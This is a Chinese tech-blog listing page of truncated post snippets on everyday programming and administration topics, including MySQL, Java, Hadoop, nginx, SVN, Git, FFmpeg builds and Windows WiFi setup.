引言随着企业集团的生产规模扩张，为支撑全球供应链管理，对于供应商的管理和采购过程的监控已经不局限于简单的交付以及价格的管理，目前采购及供应商管理各个环节的操作分别在不同的系统下进行，而各个数据源都独立存在，无法提供统一的数据支持；因此，为了实现对于数据分析以提供采购决策，建立报表体系成为必须。业务目标 1、通过报表为采购决策提供数据分析与支撑 2、对供应商进行综合评估以及管理，合理管理和
mysql 林鹤霄
转载源：http://blog.sina.com.cn/s/blog_4f925fc30100rx5l.html mysql -uroot -p ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES) [root@centos var]# service mysql
Linux下多线程堆栈查看工具(pstree、ps、pstack) aigo linux
原文：http://blog.csdn.net/yfkiss/article/details/6729364 1. pstree pstree以树结构显示进程$ pstree -p work | grep adsshd(22669)---bash(22670)---ad_preprocess(4551)-+-{ad_preprocess}(4552) &n
html input与textarea 值改变事件 alxw4616 JavaScript
// 文本输入框(input) 文本域(textarea)值改变事件 // onpropertychange(IE) oninput(w3c) $('input,textarea').on('propertychange input', function(event) { console.log($(this).val()) });
String类的基本用法百合不是茶 String
字符串的用法; // 根据字节数组创建字符串 byte[] by = { 'a', 'b', 'c', 'd' }; String newByteString = new String(by); 1,length() 获取字符串的长度 &nbs
JDK1.5 Semaphore实例 bijian1013 java thread java多线程 Semaphore
Semaphore类一个计数信号量。从概念上讲，信号量维护了一个许可集合。如有必要，在许可可用前会阻塞每一个 acquire()，然后再获取该许可。每个 release() 添加一个许可，从而可能释放一个正在阻塞的获取者。但是，不使用实际的许可对象，Semaphore 只对可用许可的号码进行计数，并采取相应的行动。 S
使用GZip来压缩传输量 bijian1013 java GZip
启动GZip压缩要用到一个开源的Filter：PJL Compressing Filter。这个Filter自1.5.0开始该工程开始构建于JDK5.0，因此在JDK1.4环境下只能使用1.4.6。 PJL Compressi
【Java范型三】Java范型详解之范型类型通配符 bit1129 java
定义如下一个简单的范型类， package com.tom.lang.generics; public class Generics<T> { private T value; public Generics(T value) { this.value = value; } }
【Hadoop十二】HDFS常用命令 bit1129 hadoop
1. 修改日志文件查看器 hdfs oev -i edits_0000000000000000081-0000000000000000089 -o edits.xml cat edits.xml 修改日志文件转储为xml格式的edits.xml文件，其中每条RECORD就是一个操作事务日志 2. fsimage查看HDFS中的块信息等 &nb
怎样区别nginx中rewrite时break和last ronin47
在使用nginx配置rewrite中经常会遇到有的地方用last并不能工作，换成break就可以，其中的原理是对于根目录的理解有所区别，按我的测试结果大致是这样的。 location / { proxy_pass http://test;
java-21.中兴面试题输入两个整数 n 和 m ，从数列 1 ， 2 ， 3.......n 中随意取几个数 , 使其和等于 m bylijinnan java
import java.util.ArrayList; import java.util.List; import java.util.Stack; public class CombinationToSum { /* 第21 题 2010 年中兴面试题编程求解：输入两个整数 n 和 m ，从数列 1 ， 2 ， 3.......n 中随意取几个数 , 使其和等
eclipse svn 帐号密码修改问题开窍的石头 eclipse SVN svn帐号密码修改
问题描述： Eclipse的SVN插件Subclipse做得很好，在svn操作方面提供了很强大丰富的功能。但到目前为止，该插件对svn用户的概念极为淡薄，不但不能方便地切换用户，而且一旦用户的帐号、密码保存之后，就无法再变更了。解决思路：删除subclipse记录的帐号、密码信息，重新输入
[电子商务]传统商务活动与互联网的结合 comsci 电子商务
某一个传统名牌产品，过去销售的地点就在某些特定的地区和阶层，现在进入互联网之后，用户的数量群突然扩大了无数倍，但是，这种产品潜在的劣势也被放大了无数倍，这种销售利润与经营风险同步放大的效应，在最近几年将会频繁出现。。。。如何避免销售量和利润率增加的
java 解析 properties-使用 Properties-可以指定配置文件路径 cuityang java properties
#mq xdr.mq.url=tcp://192.168.100.15:61618; import java.io.IOException; import java.util.Properties; public class Test { String conf = "log4j.properties"; private static final
Java核心问题集锦 darrenzhu java 基础核心难点
注意，这里的参考文章基本来自Effective Java和jdk源码 1)ConcurrentModificationException 当你用for each遍历一个list时，如果你在循环主体代码中修改list中的元素，将会得到这个Exception，解决的办法是： 1)用listIterator, 它支持在遍历的过程中修改元素， 2)不用listIterator, new一个
1分钟学会Markdown语法 dcj3sjt126com markdown
markdown 简明语法基本符号 *,-,+ 3个符号效果都一样，这3个符号被称为 Markdown符号空白行表示另起一个段落 `是表示inline代码，tab是用来标记代码段，分别对应html的code，pre标签换行单一段落( <p>) 用一个空白行连续两个空格会变成一个 <br> 连续3个符号，然后是空行
Gson使用二（GsonBuilder） eksliang json gson GsonBuilder
转载请出自出处：http://eksliang.iteye.com/blog/2175473 一.概述 GsonBuilder用来定制java跟json之间的转换格式二.基本使用实体测试类：温馨提示：默认情况下@Expose注解是不起作用的,除非你用GsonBuilder创建Gson的时候调用了GsonBuilder.excludeField
报ClassNotFoundException: Didn't find class "...Activity" on path: DexPathList gundumw100 android
有一个工程，本来运行是正常的，我想把它移植到另一台PC上，结果报： java.lang.RuntimeException: Unable to instantiate activity ComponentInfo{com.mobovip.bgr/com.mobovip.bgr.MainActivity}: java.lang.ClassNotFoundException: Didn't f
JavaWeb之JSP指令 ihuning javaweb
要点 JSP指令简介 page指令 include指令 JSP指令简介 JSP指令（directive）是为JSP引擎而设计的，它们并不直接产生任何可见输出，而只是告诉引擎如何处理JSP页面中的其余部分。 JSP指令的基本语法格式： <%@ 指令属性名="
mac上编译FFmpeg跑ios 啸笑天 ffmpeg
1、下载文件：https://github.com/libav/gas-preprocessor，复制gas-preprocessor.pl到/usr/local/bin/下，修改文件权限：chmod 777 /usr/local/bin/gas-preprocessor.pl 2、安装yasm-1.2.0 curl http://www.tortall.net/projects/yasm
sql mysql oracle中字符串连接 macroli oracle sql mysql SQL Server
有的时候，我们有需要将由不同栏位获得的资料串连在一起。每一种资料库都有提供方法来达到这个目的： MySQL: CONCAT() Oracle: CONCAT(), || SQL Server: + CONCAT() 的语法如下： Mysql 中 CONCAT(字串1, 字串2, 字串3, ...): 将字串1、字串2、字串3，等字串连在一起。请注意，Oracle的CON
Git fatal: unab SSL certificate problem: unable to get local issuer ce rtificate qiaolevip 学习永无止境每天进步一点点 git 纵观千象
// 报错如下： $ git pull origin master fatal: unable to access 'https://git.xxx.com/': SSL certificate problem: unable to get local issuer ce rtificate // 原因：由于git最新版默认使用ssl安全验证，但是我们是使用的git未设
windows命令行设置wifi surfingll windows wifi 笔记本wifi
还没有讨厌无线wifi的无尽广告么，还在耐心等待它慢慢启动么教你命令行设置笔记本电脑wifi： 1、开启wifi命令 netsh wlan set hostednetwork mode=allow ssid=surf8 key=bb123456 netsh wlan start hostednetwork pause 其中pause是等待输入，可以去掉 2、
Linux（Ubuntu）下安装sysv-rc-conf wmlJava linux ubuntu sysv-rc-conf
安装：sudo apt-get install sysv-rc-conf 使用：sudo sysv-rc-conf 操作界面十分简洁，你可以用鼠标点击，也可以用键盘方向键定位，用空格键选择，用Ctrl+N翻下一页，用Ctrl+P翻上一页，用Q退出。背景知识 sysv-rc-conf是一个强大的服务管理程序，群众的意见是sysv-rc-conf比chkconf
svn切换环境，重发布应用多了javaee标签前缀 zengshaotao javaee
更换了开发环境，从杭州，改变到了上海。svn的地址肯定要切换的，切换之前需要将原svn自带的.svn文件信息删除，可手动删除，也可通过废弃原来的svn位置提示删除.svn时删除。然后就是按照最新的svn地址和规范建立相关的目录信息，再将原来的纯代码信息上传到新的环境。然后再重新检出，这样每次修改后就可以看到哪些文件被修改过，这对于增量发布的规范特别有用。检出